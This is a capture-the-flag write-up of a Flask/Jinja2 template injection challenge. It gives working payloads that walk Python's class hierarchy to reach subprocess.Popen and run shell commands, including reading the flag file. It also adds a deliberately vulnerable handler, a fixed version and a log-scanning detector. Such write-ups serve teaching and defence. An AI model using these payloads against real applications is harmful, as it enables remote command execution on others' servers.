The page source contains two hints:
<!-- Parameter Name: search --> <!-- Method: GET -->
Enter ?search={{7*7}}
If the following appears, a template injection vulnerability exists:
You searched for:
49
Dump all classes:
{{''.__class__.__mro__[2].__subclasses__()}}
Find the index of subprocess.Popen:
import requests
import re
import html

url = "http://f2c96b25-5710-4057-b5e2-12e39acf4921.node3.buuoj.cn/?search={{%27%27.__class__.__mro__[2].__subclasses__()}}"
s = requests.get(url).text
# the subclass list is rendered inside <h3>[ ... ]</h3>; capture everything after the opening bracket
result = re.findall(r"<h2>You searched for:</h2>\n <h3>\[(.*?)</h3>", s, re.S)
# unescape the HTML entities (&lt; / &gt; around the class names), then drop the trailing ']'
result = html.unescape(result[0])[:-1]
result = result.split(', ')
print(result.index("<class 'subprocess.Popen'>"))
Running it gives: 258.
{{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}
Get the flag:
{{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}
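For context on why the {{7*7}} probe works and how the same endpoint is written safely, here is an added example that is not part of the original writeup or the challenge's code. It reproduces the vulnerable pattern (user input concatenated into the Jinja2 template source) beside the fixed pattern (constant template, input passed as a context variable), and adds a small scanner that flags template expressions in request paths using constructed access-log lines. The Jinja2 import, the function names and the log lines are all assumptions made for this example.

```python
import re
from urllib.parse import unquote
from jinja2 import Environment


def render_search_vulnerable(user_input: str) -> str:
    """Vulnerable pattern (hypothetical handler): the user's input becomes part
    of the template source, so Jinja2 evaluates any {{ ... }} it contains."""
    template = Environment().from_string("You searched for: " + user_input)
    return template.render()


def render_search_fixed(user_input: str) -> str:
    """Fixed pattern: the template source is a constant and the input is passed
    as a variable, so it is rendered as text rather than evaluated.
    autoescape=True additionally neutralises HTML in the value."""
    env = Environment(autoescape=True)
    template = env.from_string("You searched for: {{ search }}")
    return template.render(search=user_input)


# Constructed access-log lines (not from the original page): a benign search,
# an arithmetic probe, and an attempt to walk the class hierarchy.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /?search=flask HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:12:00:01 +0000] "GET /?search=%7B%7B7*7%7D%7D HTTP/1.1" 200 520
10.0.0.7 - - [01/Jan/2024:12:00:05 +0000] "GET /?search=%7B%7B%27%27.__class__.__mro__%5B2%5D.__subclasses__%28%29%7D%7D HTTP/1.1" 200 90000
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Jinja2 expression or statement delimiters anywhere in the decoded path.
TEMPLATE_EXPR_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)


def classify_request(line: str):
    """Return None for a benign line, otherwise (severity, decoded_path)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path = unquote(m.group(1))  # the probe arrives percent-encoded
    if not TEMPLATE_EXPR_RE.search(path):
        return None
    # Dunder attribute walks (__class__, __mro__, __subclasses__) mark an
    # attempt to reach code execution rather than a simple {{7*7}} probe.
    severity = "high" if "__" in path else "medium"
    return severity, path


def scan_log(text: str):
    """Scan a whole log; return (line number, severity, decoded path) per hit."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        verdict = classify_request(line)
        if verdict:
            hits.append((lineno, *verdict))
    return hits


if __name__ == "__main__":
    print(render_search_vulnerable("{{7*7}}"))  # evaluated: 49
    print(render_search_fixed("{{7*7}}"))       # echoed as text
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The fix is the template boundary: once the input travels as a render variable instead of template source, the {{7*7}} probe comes back unchanged and the __subclasses__ chain is never evaluated. The log scanner keys on the delimiters rather than on specific payload strings, so encoded variants still trip it after unquoting.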